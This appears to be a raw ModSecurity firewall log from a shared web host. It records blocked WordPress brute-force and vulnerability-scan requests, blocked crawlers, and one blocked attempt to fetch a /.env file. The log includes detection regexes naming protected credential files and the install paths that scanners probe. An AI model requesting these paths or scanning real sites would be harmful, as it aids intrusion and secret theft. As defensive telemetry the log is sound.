[Tue May 26 15:38:48.688673 2026] [security2:error] [pid 733610:tid 733801] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxMMLL_4PasUNKBsfCgQAAAD0"]
[Tue May 26 15:38:49.167889 2026] [security2:error] [pid 733610:tid 733630] [remote 57.141.2.26:51014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 26.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVxMcLL_4PasUNKBsfCqAAAdBM"]
[Tue May 26 15:38:50.984375 2026] [security2:error] [pid 733610:tid 733848] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxMsLL_4PasUNKBsfC4wAAAGw"]
[Tue May 26 15:38:51.487507 2026] [security2:error] [pid 733610:tid 733799] [client 5.35.113.149:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxM8LL_4PasUNKBsfDAAAAADs"]
[Tue May 26 15:38:53.406754 2026] [security2:error] [pid 733610:tid 733854] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxNMLL_4PasUNKBsfDNwAAAHI"]
[Tue May 26 15:38:54.729807 2026] [security2:error] [pid 733610:tid 733745] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxNsLL_4PasUNKBsfDYgAAAAU"]
[Tue May 26 15:38:54.867464 2026] [security2:error] [pid 733610:tid 733667] [remote 18.190.7.192:52826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVxNsLL_4PasUNKBsfDcAAABjg"]
[Tue May 26 15:38:54.943498 2026] [security2:error] [pid 733610:tid 733853] [client 103.153.130.62:54838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxNsLL_4PasUNKBsfDdAAAAHE"]
[Tue May 26 15:38:54.943609 2026] [security2:error] [pid 733610:tid 733853] [client 103.153.130.62:54838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxNsLL_4PasUNKBsfDdAAAAHE"]
[Tue May 26 15:38:55.753096 2026] [security2:error] [pid 733610:tid 733815] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxN8LL_4PasUNKBsfDiQAAAEs"], referer: https://www.anujtradingco.com/
[Tue May 26 15:38:56.991781 2026] [security2:error] [pid 733610:tid 733849] [client 206.198.216.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVxOMLL_4PasUNKBsfDrwAAAG0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1271313&moderation-hash=09a766a7143fcbc7ef6d413f8fa5914b
[Tue May 26 15:38:57.568604 2026] [security2:error] [pid 733610:tid 733861] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxOcLL_4PasUNKBsfDtQAAAHk"]
[Tue May 26 15:38:57.707001 2026] [security2:error] [pid 733610:tid 733815] [client 185.191.171.1:45480] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVxOcLL_4PasUNKBsfDwQAAAEs"]
[Tue May 26 15:38:57.707138 2026] [security2:error] [pid 733610:tid 733815] [client 185.191.171.1:45480] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVxOcLL_4PasUNKBsfDwQAAAEs"]
[Tue May 26 15:38:58.732095 2026] [security2:error] [pid 733610:tid 733857] [client 34.74.242.206:1588] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVxOsLL_4PasUNKBsfD4wAAAHU"]
[Tue May 26 15:38:58.732219 2026] [security2:error] [pid 733610:tid 733857] [client 34.74.242.206:1588] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVxOsLL_4PasUNKBsfD4wAAAHU"]
[Tue May 26 15:38:58.871442 2026] [security2:error] [pid 733610:tid 733743] [client 34.74.242.206:1579] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.businessclubinternational.net"] [uri "/"] [unique_id "ahVxOsLL_4PasUNKBsfD5AAAAAM"]
[Tue May 26 15:38:58.871555 2026] [security2:error] [pid 733610:tid 733743] [client 34.74.242.206:1579] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.businessclubinternational.net"] [uri "/"] [unique_id "ahVxOsLL_4PasUNKBsfD5AAAAAM"]
[Tue May 26 15:38:58.920314 2026] [security2:error] [pid 733610:tid 733781] [client 223.123.38.127:15210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxOsLL_4PasUNKBsfD3AAAACk"]
[Tue May 26 15:38:58.920491 2026] [security2:error] [pid 733610:tid 733781] [client 223.123.38.127:15210] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxOsLL_4PasUNKBsfD3AAAACk"]
[Tue May 26 15:38:59.664065 2026] [security2:error] [pid 733610:tid 733860] [client 5.255.126.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxO8LL_4PasUNKBsfD_gAAAHg"]
[Tue May 26 15:38:59.930234 2026] [security2:error] [pid 733610:tid 733742] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxO8LL_4PasUNKBsfD-wAAAAI"]
[Tue May 26 15:39:00.625366 2026] [security2:error] [pid 733610:tid 733696] [remote 216.73.216.30:36034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxPMLL_4PasUNKBsfEIgAAClU"]
[Tue May 26 15:39:01.453262 2026] [security2:error] [pid 733610:tid 733708] [remote 216.73.216.30:36034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxPcLL_4PasUNKBsfEUgAACmE"]
[Tue May 26 15:39:01.755059 2026] [security2:error] [pid 733610:tid 733711] [remote 216.73.216.30:36034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxPcLL_4PasUNKBsfEXQAACmQ"]
[Tue May 26 15:39:02.173694 2026] [security2:error] [pid 733610:tid 733716] [remote 216.73.216.30:36034] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahVxPsLL_4PasUNKBsfEfAAACmk"]
[Tue May 26 15:39:02.214121 2026] [security2:error] [pid 733610:tid 733762] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxPcLL_4PasUNKBsfEXAAAABY"]
[Tue May 26 15:39:03.734903 2026] [security2:error] [pid 733610:tid 733751] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxP8LL_4PasUNKBsfEqAAAAAs"]
[Tue May 26 15:39:05.251331 2026] [security2:error] [pid 733610:tid 733798] [client 103.153.130.62:55191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxQcLL_4PasUNKBsfE4wAAADo"]
[Tue May 26 15:39:05.251458 2026] [security2:error] [pid 733610:tid 733798] [client 103.153.130.62:55191] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVxQcLL_4PasUNKBsfE4wAAADo"]
[Tue May 26 15:39:06.263137 2026] [security2:error] [pid 733610:tid 733822] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxQcLL_4PasUNKBsfE-gAAAFI"]
[Tue May 26 15:39:09.158336 2026] [security2:error] [pid 733610:tid 733853] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxRMLL_4PasUNKBsfFTAAAAHE"]
[Tue May 26 15:39:09.206235 2026] [security2:error] [pid 733610:tid 733781] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxRcLL_4PasUNKBsfFVgAAACk"]
[Tue May 26 15:39:09.512584 2026] [security2:error] [pid 733610:tid 733633] [remote 103.145.62.145:62106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVxRcLL_4PasUNKBsfFZAAALhY"]
[Tue May 26 15:39:09.723213 2026] [security2:error] [pid 733610:tid 733756] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxRcLL_4PasUNKBsfFbAAAABA"]
[Tue May 26 15:39:10.484900 2026] [security2:error] [pid 733610:tid 733639] [remote 146.190.97.18:61972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.97.190.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php"] [unique_id "ahVxRsLL_4PasUNKBsfFgwAAURw"]
[Tue May 26 15:39:10.724856 2026] [security2:error] [pid 733610:tid 733776] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxRsLL_4PasUNKBsfFhwAAACQ"]
[Tue May 26 15:39:10.774910 2026] [security2:error] [pid 733610:tid 733830] [client 195.178.110.34:43250] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahVxRsLL_4PasUNKBsfFjgAAAFo"]
[Tue May 26 15:39:10.981964 2026] [security2:error] [pid 733610:tid 733778] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxRsLL_4PasUNKBsfFhgAAACY"]
[Tue May 26 15:39:12.252701 2026] [security2:error] [pid 733610:tid 733759] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxSMLL_4PasUNKBsfFqAAAABM"]
[Tue May 26 15:39:12.701139 2026] [security2:error] [pid 733610:tid 733744] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxSMLL_4PasUNKBsfFrwAAAAQ"]
[Tue May 26 15:39:13.264410 2026] [security2:error] [pid 733610:tid 733821] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxScLL_4PasUNKBsfFwAAAAFE"]
[Tue May 26 15:39:13.270466 2026] [security2:error] [pid 733610:tid 733802] [client 54.205.63.235:57651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFxAAAAD4"]
[Tue May 26 15:39:13.336742 2026] [security2:error] [pid 733610:tid 733796] [client 54.205.63.235:57983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFyAAAADg"]
[Tue May 26 15:39:13.337815 2026] [security2:error] [pid 733610:tid 733825] [client 54.205.63.235:57984] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFyQAAAFU"]
[Tue May 26 15:39:13.338172 2026] [security2:error] [pid 733610:tid 733830] [client 54.205.63.235:57985] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFygAAAFo"]
[Tue May 26 15:39:13.338653 2026] [security2:error] [pid 733610:tid 733753] [client 54.205.63.235:57986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFywAAAA0"]
[Tue May 26 15:39:13.339316 2026] [security2:error] [pid 733610:tid 733840] [client 54.205.63.235:57987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFzAAAAGQ"]
[Tue May 26 15:39:13.341528 2026] [security2:error] [pid 733610:tid 733793] [client 54.205.63.235:57988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVxScLL_4PasUNKBsfFzQAAADU"]
[Tue May 26 15:39:13.342030 2026] [security2:error] [pid 733610:tid 733784] [client 54.205.63.235:57989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfFzgAAACw"]
[Tue May 26 15:39:13.344397 2026] [security2:error] [pid 733610:tid 733775] [client 54.205.63.235:57991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfFzwAAACM"]
[Tue May 26 15:39:13.344872 2026] [security2:error] [pid 733610:tid 733773] [client 54.205.63.235:57993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF0QAAACE"]
[Tue May 26 15:39:13.344945 2026] [security2:error] [pid 733610:tid 733851] [client 54.205.63.235:57992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/old/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF0AAAAG8"]
[Tue May 26 15:39:13.345223 2026] [security2:error] [pid 733610:tid 733772] [client 54.205.63.235:57995] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF0gAAACA"]
[Tue May 26 15:39:13.345390 2026] [security2:error] [pid 733610:tid 733812] [client 54.205.63.235:57994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF0wAAAEg"]
[Tue May 26 15:39:13.345504 2026] [security2:error] [pid 733610:tid 733778] [client 54.205.63.235:57996] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF1AAAACY"]
[Tue May 26 15:39:13.347602 2026] [security2:error] [pid 733610:tid 733752] [client 54.205.63.235:57997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF1QAAAAw"]
[Tue May 26 15:39:13.403884 2026] [security2:error] [pid 733610:tid 733777] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVxSMLL_4PasUNKBsfFvgAAACU"]
[Tue May 26 15:39:13.404759 2026] [security2:error] [pid 733610:tid 733843] [client 54.205.63.235:58048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "t9-security.eu"] [uri "/test/wp-admin/install.php"] [unique_id "ahVxScLL_4PasUNKBsfF2QAAAGc"]
[Tue May 26 15:39:13.832497 2026] [security2:error] [pid 733610:tid 733786] [client 5.255.126.59:40910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVxScLL_4PasUNKBsfF4wAAAC4"]
[Tue May 26 15:39:15.105322 2026] [security2:error] [pid 733610:tid 733771] [client 223.123.38.127:15213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxS8LL_4PasUNKBsfGBwAAAB8"]
[Tue May 26 15:39:15.105536 2026] [security2:error] [pid 733610:tid 733771] [client 223.123.38.127:15213] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVxS8LL_4PasUNKBsfGBwAAAB8"]
